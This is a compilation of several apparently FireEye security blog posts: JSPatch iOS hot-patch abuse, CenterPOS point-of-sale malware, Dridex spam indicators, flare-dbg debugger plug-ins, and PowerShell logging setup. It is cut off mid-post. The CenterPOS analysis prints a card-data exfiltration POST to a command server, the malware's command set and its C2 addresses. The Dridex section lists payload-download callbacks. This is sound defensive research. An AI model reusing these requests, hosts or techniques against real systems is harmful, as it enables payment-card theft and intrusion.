JSPatch Machinery

The JSPatch author, using the alias Bang, provided a common example of how JSPatch can be used to update a faulty iOS app on his blog:

Figure 1 shows an Objc implementation of a UITableViewController with class name JPTableViewController that provides data population via the selector tableView:didSelectRowAtIndexPath:. At line 5, it retrieves data from the backend source represented by an array of strings with an index mapping to the selected row number. In many cases, this functions fine; however, when the row index exceeds the range of the data source array, which can easily happen, the program will throw an exception and subsequently cause the app to crash. Crashing an app is never an appealing experience for users.

Figure 1. Buggy Objc code without JSPatch

Within the realm of Apple-provided technologies, the way to remediate this situation is to rebuild the application with updated code to fix the bug and submit the newly built app to the App Store for approval. While the review process for updated apps often takes less time than the initial submission review, the process can still be time-consuming, unpredictable, and can potentially cause loss of business if app fixes are not delivered in a timely and controlled manner.

However, if the original app is embedded with the JSPatch engine, its behavior can be changed according to the JavaScript code loaded at runtime. This JavaScript file (hxxp://cnbang.net/bugfix.JS in the above example) is remotely controlled by the app developer. It is delivered to the app through network communication.   

Figure 2 shows the standard way of setting up JSPatch in an iOS app. This code would allow download and execution of a JavaScript patch when the app starts:

Figure 2. Objc code enabling JSPatch in an app

JSPatch is indeed lightweight. In this case, the only additional work to enable it is to add seven lines of code to the application:didFiishLaunchingWithOptions: selector. Figure 3 shows the JavaScript downloaded from hxxp://cnbang.net/bugfix.JS that is used to patch the faulty code.

Figure 3. JSPatch hot patch fixing index out of bound bug in Figure 1

Malicious Capability Showcase

JSPatch is a boon to iOS developers. In the right hands, it can be used to quickly and effectively deploy patches and code updates. But in a non-utopian world like ours, we need to assume that bad actors will leverage this technology for unintended purposes. Specifically, if an attacker is able to tamper with the content of JavaScript file that is eventually loaded by the app, a range of attacks can be successfully performed against an App Store application.

Target App

We randomly picked a legitimate app[1] with JSPatch enabled from the App Store. The logistics of setting up the JSPatch platform and resources for code patching are packaged in this routine [AppDelegate excuteJSPatch:], as shown in Figure 4[2]:

Figure 4. JSPatch setup in the targeted app

There is a sequence of flow from the app entry point (in this case the AppDelegate class) to where the JavaScript file containing updates or patch code is written to the file system. This process involves communicating with the remote server to retrieve the patch code. On our test device, we eventually found that the JavaScript patch code is hashed and stored at the location shown in Figure 5. The corresponding content is shown in Figure 6 in Base64-encoded format:

Figure 5. Location of downloaded JavaScript on test device


Figure 6. Encrypted patch content

While the target app developer has taken steps to secure this sensitive data from prying eyes by employing Base64 encoding on top of a symmetric encryption, one can easily render this attempt futile by running a few commands through Cycript. The patch code, once decrypted, is shown in Figure 7:

Figure 7. Decrypted original patch content retrieved from remote server

This is the content that gets loaded and executed by JPEngine, the component provided by the JSPatch framework embedded in the target app. To change the behavior of the running app, one simply needs to modify the content of this JavaScript blob. Below we show several possibilities for performing malicious actions that are against Apple’s App Review Guidelines. Although the examples below are from a jailbroken device, we have demonstrated that they will work on non-jailbroken devices as well.

Example 1: Load arbitrary public frameworks into app process

a.     Example public framework: /System/Library/Frameworks/Accounts.framework
b.     Private APIs used by public framework: [ACAccountStore init], [ACAccountStore allAccountTypes]

The target app discussed above, when running, loads the frameworks shown in Figure 8 into its process memory:


Figure 8. iOS frameworks loaded by the target app

Note that the list above – generated from the Apple-approved iOS app binary – does not contain Accounts.framework. Therefore, any “dangerous” or “risky” operations that rely on the APIs provided by this framework are not expected to take place. However, the JavaScript code shown in Figure 9 invalidates that assumption.

Figure 9. JavaScript patch code that loads the Accounts.framework into the app process

If this JavaScript code were delivered to the target app as a hot patch, it could dynamically load a public framework, Accounts.framework, into the running process. Once the framework is loaded, the script has full access to all of the framework’s APIs. Figure 10 shows the outcome of executing the private API [ACAccountStore allAccountTypes], which outputs 36 account types on the test device. This added behavior does not require the app to be rebuilt, nor does it require another review through the App Store.  

Figure 10. The screenshot of the console log for utilizing Accounts.framework

The above demonstration highlights a serious security risk for iOS app users and app developers. The JSPatch technology potentially allows an individual to effectively circumvent the protection imposed by the App Store review process and perform arbitrary and powerful actions on the device without consent from the users. The dynamic nature of the code makes it extremely difficult to catch a malicious actor in action. We are not providing any meaningful exploit in this blog post, but instead only pointing out the possibilities to avoid low-skilled attackers taking advantage of off-the-shelf exploits.

Example 2: Load arbitrary private frameworks into app process

a.     Example private framework: /System/Library/PrivateFrameworks/BluetoothManager.framework
b.   
Private APIs used by example framework: [BluetoothManager connectedDevices], [BluetoothDevice name]

Similar to the previous example, a malicious JSPatch JavaScript could instruct an app to load an arbitrary private framework, such as the BluetoothManager.framework, and further invoke private APIs to change the state of the device. iOS private frameworks are intended to be used solely by Apple-provided apps. While there is no official public documentation regarding the usage of private frameworks, it is common knowledge that many of them provide private access to low-level system functionalities that may allow an app to circumvent security controls put in place by the OS. The App Store has a strict policy prohibiting third party apps from using any private frameworks. However, it is worth pointing out that the operating system does not differentiate Apple apps’ private framework usage and a third party app’s private framework usage. It is simply the App Store policy that bans third party use.

With JSPatch, this restriction has no effect because the JavaScript file is not subject to the App Store’s vetting. Figure 11 shows the code for loading the BluetoothManager.framework and utilizing APIs to read and change the states of Bluetooth of the host device. Figure 12 shows the corresponding console outputs.

Figure 11. JavaScript patch code that loads the BluetoothManager.framework into the app process

 

Figure 12. The screenshot of the console log for utilizing BluetoothManager.framework

Example 3: Change system properties via private API

a.     Example dependent framework: b/System/Library/Frameworks/CoreTelephony.framework
b.    Private API used by example framework: [CTTelephonyNetworkInfo updateRadioAccessTechnology:]

Consider a target app that is built with the public framework CoreTelephony.framework. Apple documentation explains that this framework allows one to obtain information about a user’s home cellular service provider. It exposes several public APIs to developers to achieve this, but [CTTelephonyNetworkInfo updateRadioAccessTechnology:] is not one of them. However, as shown in Figure 13 and Figure 14, we can successfully use this private API to update the device cellular service status by changing the radio technology from CTRadioAccessTechnologyHSDPA to CTRadioAccessTechnologyLTE without Apple’s consent.

Figure 13. JavaScript code that changes the Radio Access Technology of the test device

 

Figure 14. Corresponding execution output of the above JavaScript code via Private API

Example 4: Access to Photo Album (sensitive data) via public APIs

a.     Example loaded framework: /System/Library/Frameworks/Photos.framework
b.     Public APIs: [PHAsset fetchAssetsWithMediaType:options:]

Privacy violations are a major concern for mobile users. Any actions performed on a device that involve accessing and using sensitive user data (including contacts, text messages, photos, videos, notes, call logs, and so on) should be justified within the context of the service provided by the app. However, Figure 15 and Figure 16 show how we can access the user’s photo album by leveraging the private APIs from built-in Photo.framework to harvest the metadata of photos. With a bit more code, one can export this image data to a remote location without the user’s knowledge.

Figure 15. JavaScript code that access the Photo Library

 

Figure 16. Corresponding output of the above JavaScript in Figure 15

Example 5: Access to Pasteboard in real time

a.     Example Framework: /System/Library/Frameworks/UIKit.framework
b
.     APIs: [UIPasteboard strings], [UIPasteboard items], [UIPasteboard string]

iOS pasteboard is one of the mechanisms that allows a user to transfer data between apps. Some security researchers have raised concerns regarding its security, since pasteboard can be used to transfer sensitive data such as accounts and credentials. Figure 17 shows a simple demo function in JavaScript that, when running on the JSPatch framework, scrapes all the string contents off the pasteboard and displays them on the console. Figure 18 shows the output when this function is injected into the target application on a device.

Figure 17. JavaScript code that scraps the pasteboard which might contain sensitive information

 

Figure 18. Console output of the scraped content from pasteboard by code in Figure 17

We have shown five examples utilizing JSPatch as an attack vector, and the potential for more is only constrained by an attacker’s imagination and creativity.

Future Attacks

Much of iOS’ native capability is dependent on C functions (for example, dlopen(), UIGetImageScreen()). Due to the fact that C functions cannot be reflectively invoked, JSPatch does not support direct Objective C to JavaScript mapping. In order to use C functions in JavaScript, an app must implement JSExtension, which packs the C function into corresponding interfaces that are further exported to JavaScript.

This dependency on additional Objective C code to expose C functions casts limitations on the ability of a malicious actor to perform operations such as taking stealth screenshots, sending and intercepting text messages without consent, stealing photos from the gallery, or stealthily recording audio. But these limitations can be easily lifted should an app developer choose to add a bit more Objective C code to wrap and expose these C functions. In fact, the JSPatch author could offer such support to app developers in the near future through more usable and convenient interfaces, granted there is enough demand. In this case, all of the above operations could become reality without Apple’s consent.

Security Impact

It is a general belief that iOS devices are more secure than mobile devices running other operating systems; however, one has to bear in mind that the elements contributing to this status quo are multi-faceted. The core of Apple’s security controls to provide and maintain a secure ecosystem for iOS users and developers is their walled garden – the App Store. Apps distributed through the App Store are significantly more difficult to leverage in meaningful attacks. To this day, two main attack vectors make up all previously disclosed attacks against the iOS platform:

1.     Jailbroken iOS devices that allow unsigned or ill-signed apps to be installed due to the disabled signature checking function. In some cases, the sandbox restrictions are lifted, which allows apps to function outside of the sandbox.

2.     App sideloading via Enterprise Certifications on non-jailbroken devices. FireEye published a series of reports that detailed attacks exploiting this attack surface, and recent reports show a continued focus on this known attack vector.

However, as we have highlighted in this report, JSPatch offers an attack vector that does not require sideloading or a jailbroken device for an attack to succeed. It is not difficult to identify that the JavaScript content, which is not subject to any review process, is a potential Achilles heel in this app development architecture. Since there are few to zero security measures to ensure the security properties of this file, the following scenarios for attacking the app and the user are conceivable:

●      Precondition: 1) App embeds JSPatch platform; 2) App Developer has malicious intentions.

○      Consequences: The app developer can utilize all the Private APIs provided by the loaded frameworks to perform actions that are not advertised to Apple or the users. Since the developer has control of the JavaScript code, the malicious behavior can be temporary, dynamic, stealthy, and evasive. Such an attack, when in place, will pose a big risk to all stakeholders involved.

○      Figure 19 demonstrates a scenario of this type of attack:

Figure 19. Threat model for JSPatch used by a malicious app developer

●      Precondition: 1) Third-party ad SDK embeds JSPatch platform; 2) Host app uses the ad SDK; 3) Ad SDK provider has malicious intention against the host app.

○      Consequences: 1) Ad SDK can exfiltrate data from the app sandbox; 2) Ad SDK can change the behavior of the host app; 3) Ad SDK can perform actions on behalf of the host app against the OS.

○      This attack scenario is shown in Figure 20:

Figure 20. Threat model for JSPatch used by a third-party library provider

The FireEye discovery of iBackdoor in 2015 is an alarming example of displaced trust within the iOS development community, and serves as a sneak peek into this type of overlooked threat.

●      Precondition: 1) App embeds JSPatch platform; 2) App Developer is legitimate; 3) App does not protect the communication from the client to the server for JavaScript content; 4) A malicious actor performs a man-in-the-middle (MITM) attack that tampers with the JavaScript content.

○      Consequences: MITM can exfiltrate app contents within the sandbox; MITM can perform actions through Private API by leveraging host app as a proxy.

○      This attack scenario is shown in Figure 21:

           Figure 21. Threat model for JSPatch used by an app targeted by MITM

Field Survey

JSPatch originated from China. Since its release in 2015, it has garnered success within the Chinese region. According to JSPatch, many popular and high profile Chinese apps have adopted this technology. FireEye app scanning found a total 1,220 apps in the App Store that utilize JSPatch.

We also found that developers outside of China have adopted this framework. On one hand, this indicates that JSPatch is a useful and desirable technology in the iOS development world. On the other hand, it signals that users are at greater risk of being attacked – particularly if precautions are not taken to ensure the security of all parties involved. Despite the risks posed by JSPatch, FireEye has not identified any of the aforementioned applications as being malicious.  

Food For Thought

Many applaud Apple’s App Store for helping to keep iOS malware at bay. While it is undeniably true that the App Store plays a critical role in winning this acclaim, it is at the cost of app developers’ time and resources.

One of the manifestations of such a cost is the app hot patching process, where a simple bug fix has to go through an app review process that subjects the developers to an average waiting time of seven daysbefore updated code is approved. Thus, it is not surprising to see developers seeking various solutions that attempt to bypass this wait period, but which lead to unintended security risks that may catch Apple off guard.

JSPatch is one of several different offerings that provide a low-cost and streamlined patching process for iOS developers. All of these offerings expose a similar attack vector that allows patching scripts to alter the app behavior at runtime, without the constraints imposed by the App Store’s vetting process. Our demonstration of abusing JSPatch capabilities for malicious gain, as well as our presentation of different attack scenarios, highlights an urgent problem and an imperative need for a better solution – notably due to a growing number of app developers in China and beyond having adopted JSPatch.

Many developers have doubts that the App Store would accept technologies leveraging scripts such as JavaScript. According to Apple’s App Store Review Guidelines, apps that download code in any way or form will be rejected. However, the JSPatch community argues it is in compliance with Apple’s iOS Developer Program Information, which makes an exception to scripts and code downloaded and run by Apple's built-in WebKit framework or JavascriptCore, provided that such scripts and code do not change the primary purpose of the application by providing features or functionality that are inconsistent with the intended and advertised purpose of the application as submitted to the App Store.

The use of malicious JavaScript (which presumably changes the primary purpose of the application) is clearly prohibited by the App Store policy. JSPatch is walking a fine line, but it is not alone. In our coming reports, we intend to similarly examine more solutions in order to find a better solution that satisfies Apple and the developer community without jeopardizing the users security experience. Stay tuned!

 

[1] We have contacted the app provider regarding the issue. In order to protect the app vendor and its users, we choose to not disclose the identity before they have this issue addressed.
[2] The redacted part is the hardcoded decryption key.

 

CenterPOS: An Evolving POS Threat

$
0
0

Introduction

There has been no shortage of point-of-sale (POS) threats in the past couple of years. This type of malicious software has gained widespread notoriety in recent time due to its use in high-profile breaches, some of which involved well-known brick and mortar retailers and led to the compromise of millions of payment cards. Our investigation into these threats has led to the analysis of a relatively newer POS malware known as CenterPOS.

CenterPOS

CenterPOS malware was initially discovered in September 2015 in a directory filled with other POS malware, including NewPoSThings, two Alina variants known as “Spark” and “Joker,” and BlackPOS. This CenterPOS sample (171c4c62ab2001c2f2394c3ec021dfa3) contains an internal version of “1.7” and is a memory scraper that iterates through running processes in order to extract payment card information. The payment card information is transferred to a command and control (CnC) server via HTTP POST:

    POST /2kj1h43.php HTTP/1.1
    Content-Type: multipart/form-data; boundary=axlmcc3u.x5w
    Host: jackkk[.]com
    Content-Length: 159
    Expect: 100-continue
    Connection: Keep-Alive

    --axlmcc3u.x5w

    Content-Disposition: form-data; name="userfile";filename="1432.txt"
    Content-Type: application/octet-stream

    AAAAAAAAAAAA
    --axlmcc3u.x5w--

Table 1 shows several CenterPOS v1.7 variants and their associated CnC locations.

MD5

CnC

Version

171c4c62ab2001c2f2394c3ec021dfa3

jackkk[.]com

(resolves to 138.204.168.109)

1.7

7e6b2f107f6dbc1bc406f4359de4c5db

188.120.227.156

1.7

ef5e361a6b16d682e1506aba6164feee

188.120.227.156

1.7

c9d4ff350f26c11b934e19bb1ef7698d

rs000370.fastrootserver[.]de

(resolves to 89.163.209.117)

1.7

0d142438f731652b746c9ad7fd1a9850

sobra[.]ws

(resolves to 50.7.193.210)

1.7

Table 1: CenterPOS v1.7 samples

We discovered a live CnC server (the admin panel is shown in Figure 1) that allowed us to confirm that CenterPOS is known as “Cerebrus” in the underground (not to be confused with the RAT known as Cerberus).

Figure 1: Cerebrus 1.7 (CenterPOS) Admin Panel Login

Further investigation revealed that there is a new version of CenterPOS, version 2.0, that is functionally very similar to version 1.7. The key difference is that version 2.0 uses a configuration file to store the CnC information. When executed, the malware checks for a configuration file that can be located in one of three locations:

  • Appended to the end of the file enclosed by the strings [dup] ... [/dup].
  • A file named mscorsv.nlp located in the same directory.
  • In the registry: HKLMSYSTEMCurrentControlSetControlFramework.NET

If a configuration file is not present, the malware will open a dialog box that prompts for a password. If the correct password is entered, a dialog box will appear that allows an operator to enter CnC information, as well as a password used to encrypt the configuration file (see Figure 2).

Figure 2: Cerebrus 2.0 (CenterPOS) Configuration Builder

The malware contains two modes for scraping memory and looking for credit card information, a “smart scan” mode and a “normal scan” mode. The “normal scan” mode will act nearly the same as v1.7:

The malware iterates over all processes and begins searching process memory space if the process meets the following criteria:

  • The process is not the current running process.
  • The process name is not in the ignore list.
  • The process name is not “system,” “system idle process,” or “idle.”
  • The process file version info does not contain “microsoft,” “apple inc,” “adobe systems,” “intel corporation,” “vmware,” “mozilla,” or “host process for windows services.”
  • The process full path's SHA-256 hash is not in the SHA-256 blacklist.

If the process meets the criteria list, the malware will search all memory regions within the process searching for credit card data with regular expressions in the regular expression list.

In “smart scan” mode, the malware starts by performing a “normal scan.” Any process that has a regular expression match will be added to the “smart scan” list. After the first pass, the malware will only search the processes that are in the “smart scan” list.

After each iteration of scanning all process memory, the malware takes any data that matches and encrypts it using TripleDES with the key found in the configuration file.

The malware will send information about the system and the current settings to the CnC server after every other search. The gathered system information includes all system users, logged in users, sessions, process list, and current settings list. Each of these items will be sent in a separate HTTP POST request.

The malware primarily sends data to the CnC server, but can also receive commands. The malware can receive and process the following list of commands:

  • [restartnow] : Restarts the malware service.
  • [uninstallnow] : Uninstalls the malware.
  • [quitnow] : Terminates the current malware process.
  • <script> : <script> is a batch script to be run on the system.

In addition to processing commands, the malware also accepts commands to update its current settings. The following list shows the settings that can be changed:

  • [clientlogs] : Enable or disable logging.
  • [smartscan] : Enables or disables “smart scan.”
  • [bincountreset] : Total number of processes to scan before restarting a scan.
  • [blackmamba] : List of blacklisted values that could be matched on by the regular expressions.
  • [blackproc] : List of blacklisted process names.
  • [regexlist] : Updates the regular expression list for searching process memory.
  • [blacksha256] : Updates the blacklist of full path SHA-256 values for processes. Processes in this black list will be terminated.
  • [antihack] : Checks the Image File Execution Options settings for several executables and deletes the “Debugger” value name settings and deletes them if they exist. The executable list is: sethc.exe, osk.exe, utilman.exe, magnify.exe, and oks.exe.
  • [commonblackcards] : Use blackmamba blacklisted values.
  • [restartafter] : Restarts the service after a number of memory scan iterations.
  • [restart] : Restarts the malware service.
  • [uninstall] : Uninstalls the malware.

The operators control the compromised systems and harvest stolen payment card information through a web interface located on the CnC server, as shown in Figure 3.


Figure 3: Cerebrus 2.0 (CenterPOS) Admin Panel Login

 Table 2 shows several CenterPOS v2.0 variants and their associated CnC locations.

MD5

CnC

Version

1acf2eed3c5a8a85a34e606dd897eaac

www.x00x[.]la

(resolves to 193.189.117.58)

2.0

96b65da18a72987e1dd3be2a947412c5

193.111.139.142

2.0

a54b0812f003bb15891709ab7a125828

5m0k3[.]lol

(resolves to 193.189.117.58)

2.0

1d7d70c0699db32817f910942e7a619a

www.amprofile.co[.]uk

(resolves to 193.189.116.29)

2.0

Table 2: CenterPOS v2.0 samples

Conclusion

There is an increasing demand for POS malware in the underground as cybercriminals continue to target retailers in order to steal payment card information. CenterPOS, known in the underground as Cerebrus, is continuing to evolve. This version contains functionality that allows cybercriminals to create a configuration file. In contrast to the traditional builder-server model, the configuration file can be created from the payload itself, allowing the operators to easily update the CnC information if necessary.

Dridex Botnet Resumes Spam Operations After the Holidays

$
0
0

FireEye Labs observed that Dridex operators were active during the holiday season. However, during the post-Christmas and New Year weeks, we observed a slowdown in their spam campaigns.

Interestingly, their breaks were short. Over the past few weeks they have resumed operations and are building momentum. A small Dridex spike was seen in the first week of January 2016, followed by a few large waves of Dridex campaigns in the following weeks, as seen in Figure 1. FireEye Labs has studied this prolific spam botnet in the past, detailing some of its delivery mechanisms here and its takedown recovery here.

Figure 1. Malicious .doc and .xls attachment counts through January

These campaigns largely targeted the manufacturing, telecommunications, and financial services sectors, as seen in Figure 2.

Figure 2. Targeted industries

In addition, the campaigns mostly targeted the United States and United Kingdom, as seen in Figure 3.

Figure 3: Targeted countries

Here are quick summaries and indicators for some of the prominent campaigns.

British Gas account spam, week of January 11

Sample email:

Figure 4. British Gas themed spam message

Sending addresses:

·      khouse2@kochind.onmicrosoft.com
·      trinity<xxxx>@topsource.co.uk

Subject lines:

British Gas - A/c No. 602131633 - New Account

Attachment names:

British Gas.doc

Callback patterns:

GET /l9k7hg4/b4387kfd.exe HTTP/1.1

Callback IPs/domains:

·      amyzingbooks.com
·      powerstarthosting.com
·      webdesignoshawa.ca

 

Telephone bill themed spam, week of January 18

Sample email:

Figure 5. Telephone bill themed spam message


Sending addresses:

The Billing Team <noreply@callbilling.co.uk>

Subject lines:

Your Telephone Bill Invoices & Reports

Attachment names:

Invoice_316103_Jul_2013.doc

Callback patterns:

GET /8h75f56f/34qwj9kk.exe HTTP/1.1

Callback IPs/domains:

·      bolmgren.com
·      phaleshop.com
·      return-gaming.de

 

New Order spam, week of January 25

Sample email:

Figure 6. New Order-themed spam message

Sending addresses:

Michelle.Ludlow@dssmith.com

Subject lines:

New Order

Attachment names:

doc4502094035.doc

Callback patterns:

·      GET /4f4f/7u65j5hg.exe HTTP/1.1
·      GET /54t4f4f/7u65j5hg.exe HTTP/1.1

Callback IPs/domains:

·      elta-th.com
·      grudeal.com
·      trendcheckers.com
·      vinagps.net
·      www.cityofdavidchurch.org
·      www.hartrijders.com

Conclusion

The Dridex operators may have taken a break after Christmas, but soon after the New Year they ramped up their activities and resumed their operations as usual. It is important for organizations to remain vigilant with user education, proactive detection technologies and security policies that help prevent cybersecurity threats.

Acknowledgements

Thanks to Joonho Sa for contributing to this research.


FLARE Script Series: flare-dbg Plug-ins

$
0
0

Introduction

This post continues the FireEye Labs Advanced Reverse Engineering (FLARE) script series. In this post, we continue to discuss the flare-dbg project. If you haven’t read my first post on using flare-dbg to automate string decoding, be sure to check it out!

We created the flare-dbg Python project to support the creation of plug-ins for WinDbg. When we harness the power of WinDbg during malware analysis, we gain insight into runtime behavior of executables. flare-dbg makes this process particularly easy. This blog post discusses WinDbg plug-ins that were inspired by features from other debuggers and analysis tools. The plug-ins focus on collecting runtime information and interacting with malware during execution. Today, we are introducing three flare-dbg plug-ins, which are summarized in Table 1.

Table 1: flare-dbg plug-in summary

To demonstrate the functionality of these plug-ins, this post uses a banking trojan (MD5: 03BA3D3CEAE5F11817974C7E4BE05BDE) known as TINBA to FireEye.

injectfind

Background

A common technique used by malware is code injection. When malware allocates a memory region to inject code, the created region contains certain characteristics we use to identify them in a process’s memory space. The injectfind plug-in finds and displays information about injected regions of memory from within WinDbg.

The injectfind plug-in is loosely based off the Volatility malfind plug-in. Given a memory dump, the Volatility variant searches memory for injected code and shows an analyst injected code found within processes. Instead of requiring a memory dump, the injectfind WinDbg plug-in runs in a debugger. Similar to malfind, the injectfind plug-in identifies memory regions that may have had code injected and prints a hex dump and a disassembly listing of each identified memory region. A quick glance at the output helps us identify injected code or hooked functions. The following section shows an example of an analyst identifying injected code with injectfind.

Example

After running the TINBA malware in an analysis environment, we observe that the initial loader process exits immediately, and the explorer.exe process begins making network requests to seemingly random domains. After attaching to the explorer.exe process with Windbg and running the injectfind plug-in, we see the output shown in Figure 1.

Figure 1: Output from the injectfind plug-in

The first memory region at virtual address 0x1700000 appears to contain references to Windows library functions and is 0x17000 bytes in size. It is likely that this memory region contains the primary payload of the TINBA malware.

The second memory region at virtual address 0x1CD0000 contains a single page, 0x1000 bytes in length, and appears to have two lines of meaningful disassembly. The disassembly shows the eax register being set to 0x30 and a jump five bytes into the NtCreateProcessEx function. Figure 2 shows the disassembly of the first few instructions of the NtCreateProcessEx function.

Figure 2: NtCreateProcessEx disassembly listing

The first instruction for NtCreateProcessEx is a jmp to an address outside of ntdll's memory. The destination address is within the first memory region that injectfind identified as injected code. We can quickly conclude that the malware creates a function hook for process creation all from within a Windbg debugger session.

membreak

Background

One feature missing from Windbg that is present in OllyDbg and x64dbg is the ability to set a breakpoint on an entire memory region. This type of breakpoint is known as a memory breakpoint. Memory breakpoints are used to pause a process when a specified region of memory is executed.

Memory breakpoints are useful when you want to break on code execution without specifying a single address. For example, many packers unpack their code into a new memory region and begin executing somewhere in this new memory. Setting a memory breakpoint on the new memory region would pause the debugger at the first execution anywhere within the new memory region. This obviates the need to tediously reverse engineer the unpacking stub to identify the original entry point.

One way to implement memory breakpoints is by changing the memory protection for a memory region by adding the PAGE_GUARD memory protection flag. When this memory region is executed, a STATUS_GUARD_PAGE_VIOLATION exception occurs. The debugger handles the exception and returns control to the user. The flare-dbg plug-in membreak uses this technique to implement memory breakpoints.

Example

After locating the injected code using the injectfind plug-in, we set a memory breakpoint to pause execution within the injected code memory region. The membreak plug-in accepts one or multiple addresses as parameters. The plug-in takes each address, finds the base address for the corresponding memory region, and changes the entire region’s permissions. As shown in Figure 3, when the membreak plug-in is run with the base address of the injected code as the parameter, the debugger immediately begins running until one of these memory regions is executed.

Figure 3: membreak plug-in run in Windbg

The output for the memory breakpoint hit shows a Guard page violation and a message about first chance exceptions. As explained above, this should be expected. Once the breakpoint is hit, the membreak plug-in restores the original page permissions and returns control to the analyst.

importfind

Background

Malware often loads Windows library functions at runtime and stores the resolved addresses as global variables. Sometimes it is trivial to resolve these statically in IDA Pro, but other times this can be a tedious process. To speed up the labeling of these runtime imported functions, we created a plug-in named importfind to find these function addresses. Behind the scenes, the plug-in parses each library's export table and finds all exported function addresses. The plug-in then searches the malware’s memory and identifies references to the library function addresses. Finally, it generates an IDAPython script that can be used to annotate an IDB workspace with the resolved library function names.

Example

Going back to TINBA, we saw text referencing Windows library functions in the output from injectfind above. The screenshot of IDA Pro in Figure 2 shows this same region of data. Note that following each ASCII string containing an API name, there is a number that looks like a pointer. Unfortunately, IDA Pro does not have the same insight as the debugger, so these addresses are not resolved to API functions and named.

Figure 4: Unnamed library function addresses

We use the importfind plug-in to find the function names associated with these addresses, as shown in Figure 5.

Figure 5: importfind plug-in run in Windbg

The importfind plug-in generates an IDA Python script file that is used to rename these global variables in our IDB as shown in Figure 2. Figure 6 shows a screenshot from IDA Pro after the script has renamed the global variables to more meaningful names.

Figure 6: IDA Pro with named global variables

Conclusion

This blog post shows the power of using the flare-dbg plug-ins with a debugger to gain insight into how the malware operates at runtime. We saw how to identify injected code using the injectfind plug-in and create memory breakpoints using membreak. We also demonstrated the usefulness of the importfind plug-in for identifying and renaming runtime imported functions.

To find out how to setup and get started with flare-dbg, head over the github project page where you’ll learn about setup and usage.

Greater Visibility Through PowerShell Logging

$
0
0

Introduction

Mandiant is continuously investigating attacks that leverage PowerShell throughout all phases of the attack. A common issue we experience is a lack of available logging that adequately shows what actions the attacker performed using PowerShell. In those investigations, Mandiant routinely offers guidance on increasing PowerShell logging to provide investigators a detection mechanism for malicious activity and a historical record of how PowerShell was used on systems. This blog post details various PowerShell logging options and how they can help you obtain the visibility needed to better respond, investigate, and remediate attacks involving PowerShell.  

Background

Attackers and developers of penetration-testing frameworks are increasingly leveraging Windows PowerShell to conduct their operations. PowerShell is an extremely powerful command environment and scripting language that is built in to Microsoft Windows. By default, PowerShell does not leave many artifacts of its execution in most Windows environments. The combination of impressive functionality and stealth has made attacks leveraging PowerShell a nightmare for enterprise security teams[1].

PowerShell 2.0, which comes installed on all Windows 7/2008 systems, provides very little evidence of attacker activity. The Windows event logs show that PowerShell executed, the start and end times of sessions, and whether the session executed locally or remotely (ConsoleHost or ServerRemoteHost). However, they reveal nothing about what was executed with PowerShell. Figure 1 shows an example of the event log messages recorded in the PowerShell 2.0 log Windows PowerShell.evtx.

Figure 1: PowerShell Session Start in PowerShell 2.0

Microsoft has been taking steps to improve the security transparency of PowerShell in recent versions. The most significant improvements, such as enhanced logging, were released in PowerShell version 5.0. This enhanced logging records executed PowerShell commands and scripts, de-obfuscated code, output, and transcripts of attacker activity. Enhanced PowerShell logging is an invaluable resource, both for enterprise monitoring and incident response.

The current General Availability release of PowerShell for pre-Windows 10 systems is version 4.0, due to a recall of version 5.0. However, Microsoft back-ported several useful security features from version 5.0 to 4.0 in a series of optional updates. This post will address using the updated PowerShell version 4.0 for pre-Windows 10 systems; however, once it is available, Mandiant recommends using PowerShell version 5.0.

Installation

Windows 10 does not require any software updates to support enhanced PowerShell logging.

For Windows 7/8.1/2008/2012, updating PowerShell to enable enhanced logging requires:

»      .NET 4.5
»      Windows Management Framework (WMF) 4.0
»      The appropriate WMF 4.0 update
        -     8.1/2012 R2 – KB300850
        -     2012 – KB3119938
        -     7/2008 R2 SP1 – KB3109118

Downloading these updates from Microsoft may require the completion of an automated request process.

Logging Configuration

Logging must be configured through Group Policy as follows:

Administrative Templates → Windows Components → Windows PowerShell Figure 2: PowerShell configuration options

PowerShell supports three types of logging: module logging, script block logging, and transcription. PowerShell events are written to the PowerShell operational log Microsoft-Windows-PowerShell%4Operational.evtx.

Module Logging

Module logging records pipeline execution details as PowerShell executes, including variable initialization and command invocations. Module logging will record portions of scripts, some de-obfuscated code, and some data formatted for output. This logging will capture some details missed by other PowerShell logging sources, though it may not reliably capture the commands executed. Module logging has been available since PowerShell 3.0. Module logging events are written to Event ID (EID) 4103.

While module logging generates a large volume of events (the execution of the popular Invoke-Mimikatz script generated 2,285 events resulting in 7 MB of logs during testing), these events record valuable output not captured in other sources.

To enable module logging:

1.     In the “Windows PowerShell” GPO settings, set “Turn on Module Logging” to enabled.
2.     In the “Options” pane, click the button to show Module Name.
3.     In the Module Names window, enter * to record all modules.
    a.     Optional: To log only specific modules, specify them here. (Note: this is not recommended.)
4.     Click “OK” in the “Module Names” Window.
5.     Click “OK” in the “Module Logging” Window.

Alternately, setting the following registry values will have the same effect:

»      HKLMSOFTWAREWow6432NodePoliciesMicrosoftWindowsPowerShellModuleLogging → EnableModuleLogging = 1
»      HKLMSOFTWAREWow6432NodePoliciesMicrosoftWindowsPowerShellModuleLogging ModuleNames → * = *

Script Block Logging

Script block logging records blocks of code as they are executed by the PowerShell engine, thereby capturing the full contents of code executed by an attacker, including scripts and commands. Due to the nature of script block logging, it also records de-obfuscated code as it is executed. For example, in addition to recording the original obfuscated code, script block logging records the decoded commands passed with PowerShell’s -EncodedCommand argument, as well as those obfuscated with XOR, Base64, ROT13, encryption, etc., in addition to the original obfuscated code. Script block logging will not record output from the executed code. Script block logging events are recorded in EID 4104.

While not available in PowerShell 4.0, PowerShell 5.0 will automatically log code blocks if the block’s contents match on a list of suspicious commands or scripting techniques, even if script block logging is not enabled. These suspicious blocks are logged at the “warning” level in EID 4104, unless script block logging is explicitly disabled. This feature ensures that some forensic data is logged for known-suspicious activity, even if logging is not enabled, but it is not considered to be a security feature by Microsoft. Enabling script block logging will capture all activity, not just blocks considered suspicious by the PowerShell process. This allows investigators to identify the full scope of attacker activity. The blocks that are not considered suspicious will also be logged to EID 4104, but with “verbose” or “information” levels.

Script block logging generates fewer events than module logging (Invoke-Mimikatz generated 116 events totaling 5 MB) and records valuable indicators for alerting in a SIEM or log monitoring platform.

Group Policy also offers an option to “Log script block execution start / stop events”. This option records the start and stop of script blocks, by script block ID, in EIDs 4105 and 4106. This option may provide additional forensic information, as in the case of a PowerShell script executing over a long period, but it generates a prohibitively large number of events (96,458 events totaling 50 MB per execution of Invoke-Mimikatz) and is not recommended for most environments.

To enable script block logging:

1.     In the “Windows PowerShell” GPO settings, set “Turn on PowerShell Script Block Logging” to enabled.

Alternately, setting the following registry value will enable logging:

